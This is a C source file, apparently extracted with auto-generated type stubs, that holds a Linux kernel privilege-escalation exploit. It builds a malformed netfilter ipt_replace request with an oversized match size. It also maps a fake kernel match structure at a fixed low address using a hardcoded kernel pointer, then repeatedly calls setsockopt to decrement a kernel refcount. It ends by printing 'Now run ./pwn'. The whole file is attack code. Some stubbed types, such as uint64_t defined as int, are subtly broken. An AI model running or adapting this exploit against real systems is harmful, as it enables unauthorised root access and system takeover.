
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_6__ TYPE_3__ ;
typedef struct TYPE_5__ TYPE_2__ ;
typedef struct TYPE_4__ TYPE_1__ ;


typedef int uint64_t ;
typedef scalar_t__ uint32_t ;
struct xt_standard_target {int dummy; } ;
struct TYPE_5__ {int match; } ;
struct TYPE_4__ {int name; } ;
struct TYPE_6__ {short match_size; TYPE_2__ kernel; TYPE_1__ user; } ;
struct xt_entry_match {TYPE_3__ u; } ;
struct ipt_replace {int num_entries; int num_counters; int size; scalar_t__ valid_hooks; } ;
struct ipt_entry {int target_offset; int next_offset; } ;


 int IPPROTO_RAW ;
 int IPT_SO_SET_REPLACE ;
 int MALLOC_SIZE ;
 int PF_INET ;
 int SOCK_RAW ;
 int SOL_IP ;
 int close (int) ;
 int free (void*) ;
 void* malloc (int ) ;
 int memset (void*,int ,int ) ;
 scalar_t__ mmap (void*,int,int,int,int ,int ) ;
 int perror (char*) ;
 int printf (char*) ;
 int setsockopt (int,int ,int ,void*,int) ;
 int socket (int ,int ,int ) ;
 int strcpy (int ,char*) ;

int decr(void *p) {
 int sock, optlen;
 int ret;
 void *data;
 struct ipt_replace *repl;
 struct ipt_entry *entry;
 struct xt_entry_match *ematch;
 struct xt_standard_target *target;
 unsigned i;

 sock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW);

 if (sock == -1) {
         perror("socket");
         return -1;
 }

 data = malloc(MALLOC_SIZE);

 if (data == ((void*)0)) {
  perror("malloc");
  return -1;
 }

 memset(data, 0, MALLOC_SIZE);

 repl = (struct ipt_replace *) data;
 repl->num_entries = 1;
 repl->num_counters = 1;
 repl->size = sizeof(*repl) + sizeof(*target) + 0xffff;
 repl->valid_hooks = 0;

 entry = (struct ipt_entry *) (data + sizeof(struct ipt_replace));
 entry->target_offset = 74;
 entry->next_offset = sizeof(*entry) + sizeof(*ematch) + sizeof(*target);

 ematch = (struct xt_entry_match *) (data + sizeof(struct ipt_replace) + sizeof(*entry));

 strcpy(ematch->u.user.name, "icmp");
 void *kmatch = (void*)mmap((void *)0x10000, 0x1000, 7, 0x32, 0, 0);
 uint64_t *me = (uint64_t *)(kmatch + 0x58);
 *me = 0xffffffff821de10d;

 uint32_t *match = (uint32_t *)((char *)&ematch->u.kernel.match + 4);
 *match = (uint32_t)kmatch;

 ematch->u.match_size = (short)0xffff;

 target = (struct xt_standard_target *)(data + sizeof(struct ipt_replace) + 0xffff + 0x8);
 uint32_t *t = (uint32_t *)target;
 *t = (uint32_t)kmatch;

 printf("[!] Decrementing the refcount. This may take a while...\n");
 printf("[!] Wait for the \"Done\" message (even if you'll get the prompt back).\n");

 for (i = 0; i < 0xffffff/2+1; i++) {
  ret = setsockopt(sock, SOL_IP, IPT_SO_SET_REPLACE, (void *) data, 66*1024);
 }

 close(sock);
 free(data);
 printf("[+] Done! Now run ./pwn\n");

 return 0;
}
